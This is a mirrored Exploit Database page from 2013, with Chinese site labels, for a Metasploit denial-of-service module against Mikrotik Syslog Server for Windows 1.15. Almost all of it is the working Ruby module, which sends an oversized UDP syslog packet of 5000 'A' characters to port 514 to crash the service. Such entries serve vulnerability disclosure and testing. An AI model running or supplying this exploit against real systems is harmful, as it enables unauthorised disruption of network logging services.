Mikrotik Syslog Server for Windows 1.15 – Denial of Service (Metasploit)

• Exploit Database
• 138 阅读

• 作者： xis_one
  日期： 2013-04-22
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/24968/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  # Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS # Date: 19.04.2013 # Exploit Author: xis_one@STM Solutions # Vendor Homepage:www.mikrotik.com # Software Link: http://www.mikrotik.com/download/MT_Syslog.exe # Version: 1.15 (most recent version 19.04.2013) # Tested on: Windows XP SP3, Windows 7 SP1   require &apos;msf/core&apos;   class Metasploit3 < Msf::Auxiliary   include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos   def initialize super( &apos;Name&apos;=> &apos;Mikrotik Syslog Server for Windows - remote BOF DOS&apos;, &apos;Description&apos; => %q{ This module triggers the windows socket error WSAEMSGSIZE (message to long) in the Mikrotik Syslog Server for Windows v 1.15 and crashes it. The long syslog message overwrite the allocated buffer space causing the socket error.   }, &apos;Author&apos;=> &apos;xis_one@STM Solutions&apos;, &apos;License&apos; => MSF_LICENSE, &apos;DisclosureDate&apos; => &apos;Apr 19 2013&apos;)   register_options( [ Opt::RPORT(514) ]) end   def run connect_udp pkt = "<0>" + "Apr19 " +"10.0.0.2 " + "badass" + ": " + "A"*5000 print_status("Crashing the remote Mikrotik syslog server #{rhost}") udp_sock.put(pkt) disconnect_udp end end